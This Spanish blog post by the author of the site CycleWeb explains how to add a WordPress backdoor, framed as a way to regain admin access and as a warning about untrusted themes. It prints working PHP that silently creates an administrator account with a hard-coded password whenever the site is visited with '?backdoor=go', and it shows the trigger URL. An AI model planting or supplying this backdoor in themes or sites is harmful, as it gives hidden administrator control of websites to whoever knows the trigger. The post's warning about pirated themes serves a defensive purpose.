Crear una puerta trasera en WordPress

Vamos a arrancar con una entrada muy simple, pero que puede que os guste mucho y os resulte de gran ayuda. Imagina que pierdes los datos de acceso a tu cuenta, pero además, no recuerdas el correo asociado a tu usuario de WordPress, por lo que no tienen manera de acceder a tu web. Bien, si dispones de acceso a tus archivos, ya sea por FTP (File Transfer Protocol), Cpanel u otro sistema. Si no tienes acceso a tus archivos, consulta con la empresa que tengas contratada el hosting web.

Básicamente, para crear una puerta trasera en WordPress tenemos que crear una función que se cargue en la cabecera de nuestro tema cuando llamemos a una determinada dirección. Se creará un usuario con permisos de administrador y tendremos acceso total a nuestro WordPress.

Código

A continuación dejo el código necesario para la creación de la puerta trasera en WordPress.

<?php
add_action('wp_head', 'my_backdoor');
 
function my_backdoor() {
    If ($_GET['backdoor'] == 'go') {
        require('wp-includes/registration.php');
        If (!username_exists('cycleweb')) {
            $user_id = wp_create_user('cycleweb', 'contraseña');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
?>

El código lo que hace es crear una funcion en la que se comprueba que el usuario ‘cycleweb’ en este caso no existe. En caso de no existir se crea un usuario con login ‘cycleweb’ y contraseña ‘contraseña’. Finalmente se le asigna permisos como administrador.

Para concluir debemos acceder a:
«tuweb.es/?backdoor=go»
En mi caso sería:
«cycleweb.es/?backdoor=go»

Si queremos poner otra palabra que no sea backdoor en el link, lo único que tenemos que hacer es modificar es en el código el $_GET[‘backdoor’] por $_GET[‘loquequiera’].

Esto nos retornaría a la página de inicio y el usuario ‘cycleweb’ ya se habría creado.  Como habréis observado es un procedimiento muy sencillo y rápido con el que podemos tomar el control de una web si previamente tenemos acceso a los archivos.

Advertencias

Con esto, pretendo advertir de que debemos tener cuidado cuando descarguemos temas de sitios web con poca fiabilidad, o enlaces de descarga que nos lleven a servidores de descarga ‘no oficiales’. Si alguien pusiera a disposición de todo el mundo un tema ‘premium’, pero haya instalado una puerta trasera en el tema y nosotros no nos demos cuenta, podría llegar a tener acceso a nuestro WordPress. Con simplemente ponernos un formulario a la hora de la descarga en la que tengas que indicar la web para la que lo quieres, ya podrías caer.

Hay que ser especialmente precavidos con estas cosas, ya que el querer ahorrarnos algo, puede costarnos bastante caro.

Vídeo

Para que todo quede más claro, en el siguiente vídeo explico al detalle como crear la puerta trasera en WordPress.

 

¡Espero que os haya sido de utilidad el post!

Cualquier duda que tengáis al respecto no dudéis dejármela en los comentarios.

Saludos

Sobre mí

¡Hola a todo@s!
Soy Miguel Negro López, creador de CycleWeb, estudiante de Ingeniería Informática de tercer curso en la Universidad de Castilla La Mancha ,más concretamente en Ciudad Real. Apasionado del deporte pero sobre todo del ciclismo. De ahí el nombre de este pequeño proyecto.